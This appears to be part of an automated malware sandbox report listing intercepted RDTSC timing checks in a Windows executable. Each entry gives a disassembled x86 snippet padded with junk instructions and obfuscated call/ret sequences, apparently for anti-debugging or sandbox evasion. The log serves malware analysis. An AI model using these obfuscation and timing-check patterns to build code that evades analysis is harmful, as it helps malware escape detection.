    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FABD second address: 78FAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AA98 second address: 72AABB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8E4CB125C6h 0x00000008 jmp 00007F8E4CB125D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AABB second address: 72AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AABF second address: 72AAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797BF0 second address: 797BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797BF6 second address: 797BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79956D second address: 799573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D204 second address: 79D213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8E4CB125C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D213 second address: 79D23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8E4CE84C03h 0x0000000d popad 0x0000000e jp 00007F8E4CE84BFCh 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D749 second address: 79D774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CB125D2h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8E4CB125D2h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D774 second address: 79D78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84BFAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F8E4CE84BF6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D78C second address: 79D790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D790 second address: 79D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jg 00007F8E4CE84C17h 0x0000000f jmp 00007F8E4CE84BFFh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D7B1 second address: 79D7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DBF0 second address: 79DC04 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F8E4CE84BF6h 0x00000009 jnc 00007F8E4CE84BF6h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC04 second address: 79DC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC08 second address: 79DC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8E4CE84C05h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC29 second address: 79DC40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D2h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DD7E second address: 79DD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DD86 second address: 79DD9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DD9A second address: 79DDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8E4CE84C10h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F8E4CE84C08h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DDC6 second address: 79DDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DDCF second address: 79DDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F8E4CE84BF6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F8E4CE84BF6h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DF51 second address: 79DF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DF57 second address: 79DF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E0F1 second address: 79E10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F8E4CB125D5h 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E268 second address: 79E274 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E274 second address: 79E28F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A26AA second address: 7A26EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8E4CE84C09h 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F8E4CE84BF6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 jmp 00007F8E4CE84BFFh 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A26EB second address: 7A2716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8E4CB125D7h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2FE5 second address: 7A3053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84BFDh 0x00000007 jmp 00007F8E4CE84C09h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007F8E4CE84BF6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007F8E4CE84BF6h 0x0000001d popad 0x0000001e jg 00007F8E4CE84C0Bh 0x00000024 jmp 00007F8E4CE84C05h 0x00000029 popad 0x0000002a pushad 0x0000002b jno 00007F8E4CE84BF8h 0x00000031 jne 00007F8E4CE84BFCh 0x00000037 js 00007F8E4CE84BF6h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3053 second address: 7A305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A330B second address: 7A330F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A330F second address: 7A3315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3315 second address: 7A332D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnc 00007F8E4CE84BF6h 0x0000000b js 00007F8E4CE84BF6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A35E2 second address: 7A35EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F8E4CB125CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A23EA second address: 7A23F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jnp 00007F8E4CE84BF6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A23F8 second address: 7A2416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8E4CB125C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jne 00007F8E4CB125D8h 0x00000013 jo 00007F8E4CB125C8h 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9529 second address: 7A9530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8155 second address: 7A8191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D3h 0x00000007 jmp 00007F8E4CB125CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8E4CB125D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8191 second address: 7A8195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8195 second address: 7A81A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A84EB second address: 7A84EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A84EF second address: 7A850B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A850B second address: 7A8511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E57 second address: 7A7E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F8E4CB125C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E67 second address: 7A7E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8E4CE84BFAh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E79 second address: 7A7E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E7F second address: 7A7E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E83 second address: 7A7E93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F8E4CB125C6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7E93 second address: 7A7E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8D13 second address: 7A8D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E4CB125CFh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9201 second address: 7A9210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F8E4CE84BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD30A second address: 7AD30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1711 second address: 7B1715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1715 second address: 7B172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ecx 0x00000009 jl 00007F8E4CB125C6h 0x0000000f jns 00007F8E4CB125C6h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B172E second address: 7B1740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8E4CE84BF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772E01 second address: 772E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772E05 second address: 772E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772E0B second address: 7558D1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E4CB125C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+1244DB9Ah], ebx 0x00000015 lea eax, dword ptr [ebp+12482B30h] 0x0000001b and ch, 00000011h 0x0000001e push eax 0x0000001f pushad 0x00000020 jns 00007F8E4CB125CCh 0x00000026 push eax 0x00000027 jns 00007F8E4CB125C6h 0x0000002d pop eax 0x0000002e popad 0x0000002f mov dword ptr [esp], eax 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F8E4CB125C8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c jp 00007F8E4CB125C8h 0x00000052 mov ch, ah 0x00000054 call dword ptr [ebp+122D1F57h] 0x0000005a push eax 0x0000005b push edx 0x0000005c jns 00007F8E4CB125D5h 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772F4C second address: 772F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772F50 second address: 772F5D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773450 second address: 773455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773455 second address: 77345B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77345B second address: 77345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7735DD second address: 7735E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7735E3 second address: 7735E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7735E7 second address: 7735F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773658 second address: 77369D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8E4CE84BFCh 0x00000008 jo 00007F8E4CE84BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnl 00007F8E4CE84C00h 0x00000017 xchg eax, esi 0x00000018 movsx ecx, dx 0x0000001b nop 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F8E4CE84C03h 0x00000023 jne 00007F8E4CE84BF6h 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7737B0 second address: 7737BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7737BD second address: 7737E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jg 00007F8E4CE84C0Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E4CE84C01h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7737E0 second address: 7737EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773EB3 second address: 773ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CE84C06h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773ECE second address: 773ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773ED3 second address: 773ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774098 second address: 77409C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77409C second address: 7740BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E4CE84C04h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7740BE second address: 7740C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7741EC second address: 774207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774207 second address: 7742A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F8E4CB125C8h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8E4CB125C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 cmc 0x00000028 xor dword ptr [ebp+122D2830h], edx 0x0000002e jmp 00007F8E4CB125D1h 0x00000033 lea eax, dword ptr [ebp+12482B30h] 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F8E4CB125C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 jmp 00007F8E4CB125D2h 0x00000058 mov dword ptr [ebp+122D1EA5h], edi 0x0000005e nop 0x0000005f pushad 0x00000060 pushad 0x00000061 jmp 00007F8E4CB125D0h 0x00000066 jne 00007F8E4CB125C6h 0x0000006c popad 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7742A2 second address: 7742B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jc 00007F8E4CE84C04h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7742B5 second address: 7742B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7742B9 second address: 75645B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F8E4CE84BF8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D31F8h], esi 0x00000027 jnl 00007F8E4CE84BFCh 0x0000002d call dword ptr [ebp+122D283Ah] 0x00000033 jbe 00007F8E4CE84C2Fh 0x00000039 pushad 0x0000003a jmp 00007F8E4CE84BFEh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773673 second address: 77369D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 movsx ecx, dx 0x0000000a nop 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F8E4CB125D3h 0x00000012 jne 00007F8E4CB125C6h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0BA1 second address: 7B0BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
